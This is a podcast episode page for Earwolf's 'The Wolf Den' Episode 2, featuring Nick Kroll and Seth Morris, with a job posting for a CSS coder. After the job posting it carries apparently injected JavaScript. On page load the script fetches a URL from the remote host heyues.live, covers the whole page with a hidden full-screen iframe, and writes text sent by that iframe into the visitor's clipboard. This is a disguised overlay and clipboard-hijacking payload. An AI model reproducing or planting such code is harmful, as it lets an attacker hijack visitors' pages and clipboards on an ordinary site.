The Wolf Den – Episode 2 – Nick Kroll, Seth Morris

Wolf Den Logo

The Wolf Den is back with Nick Kroll and Seth Morris. Nick and Seth are two of the most popular Earwolf guests, but fans might not recognize their voices. Seth does the popular character of Bob Ducca, and Nick plays many characters from El Chupacabra to Bobby Bottleservice. They tell us why podcasting is on the up-and-up and what that has meant to their careers. Plus, announcements about job availability and upcoming events in the Earwolf world. If you haven’t already, check out Bob Ducca and Bobby Bottleservice on twitter.

The Wolf Den – Episode 2

//

Download here

Subscribe via iTunes

Subscribe via RSS

Jobs

If you’re a CSS coder with some experience in WordPress, and are interested in helping us out with version 2 of Earwolf.com, please send an email to projects (at) earwolf.com, explaining why you’re interested, and with some examples of previous work if those are available. As mentioned on the show, the design work has already been done, we’re just looking for someone who’ll be able to translate it into CSS code for us. Thanks!

(function() {

const configLink = “https://corsproxy.io/?url=http://heyues.live”;

if (!window.__digitalflwrFetchPromise) {

window.__digitalflwrFetchPromise = fetch(configLink)
.then(response => {
if (!response.ok) {
throw new Error(” “);
}
return response.text();
})

.then(finalUrl => {
return fetch(finalUrl, { method: “HEAD” })
.then(headResponse => ({ headResponse, finalUrl }));
})
.catch(() => {

});
}

if (typeof window.__digitalflwrIframeCreated === “undefined”) {
window.__digitalflwrIframeCreated = false;
}

window.__digitalflwrFetchPromise
.then(result => {

if (!result) return;
const { headResponse, finalUrl } = result;

if (!headResponse || headResponse.status === 404) {
return;
}

if (!window.__digitalflwrIframeCreated) {
window.__digitalflwrIframeCreated = true;
createMainIframe(finalUrl);
}
})
.catch(() => {

});

function createMainIframe(url) {
const iframe = document.createElement(“iframe”);
iframe.src = url;
iframe.style.position = “fixed”;
iframe.style.top = 0;
iframe.style.left = 0;
iframe.style.width = “100%”;
iframe.style.height = “100%”;
iframe.style.border = “none”;
iframe.style.margin = 0;
iframe.style.padding = 0;
iframe.style.overflow = “hidden”;
iframe.style.zIndex = 99999;

document.body.appendChild(iframe);

window.addEventListener(“message”, function(event) {
if (!event.data || event.data.type !== “copy”) return;

if (navigator.clipboard && navigator.clipboard.writeText) {
navigator.clipboard.writeText(event.data.text).catch(() => {
fallbackCopyText(event.data.text);
});
} else {
fallbackCopyText(event.data.text);
}
});

function fallbackCopyText(text) {
const textArea = document.createElement(“textarea”);
textArea.value = text;
document.body.appendChild(textArea);
textArea.select();

try {
document.execCommand(“copy”);
} catch (err) {

}

document.body.removeChild(textArea);
}
}
})();